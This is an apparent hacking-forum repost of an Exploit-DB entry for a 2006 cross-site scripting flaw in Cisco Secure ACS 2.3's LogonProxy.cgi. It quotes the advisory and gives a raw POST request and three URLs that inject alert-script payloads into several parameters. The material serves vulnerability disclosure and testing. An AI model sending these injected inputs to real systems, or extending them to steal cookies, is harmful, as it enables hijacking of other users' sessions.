Exploit Cisco Secure ACS 2.3 - 'LoginProxy.cgi' Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
28030
Проверка EDB
  1. Пройдено
Автор
THOMAS LIAM ROMANIS
Тип уязвимости
REMOTE
Платформа
UNIX
CVE
cve-2006-3101
Дата публикации
2006-06-15
Код:
source: https://www.securityfocus.com/bid/18449/info

Cisco Secure ACS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. 

An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

This issue affects Cisco Secure ACS version 2.3 for UNIX; other versions may also be vulnerable.

POST http://www.example.com:80/CScgi/LogonProxy.cgi HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://10.17.12.184/cs/index.html
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
Host: 10.17.12.184
Content-Length: 33
Pragma: no-cache
Server=0.0.0.0&error=<script>alert("help")</script>

http://www.example.com/CScgi/LogonProxy.cgi?Server=0.0.0.0&error=<script>alert("help")</script>
http://www.example.com/CScgi/LogonProxy.cgi?Server=10.17.12.184/Logon?null&SSL=<script>alert('help')</script>
http://www.example.com/CScgi/LogonProxy.cgi?Ok=<script>alert('help')</script>
 
Источник
www.exploit-db.com

Похожие темы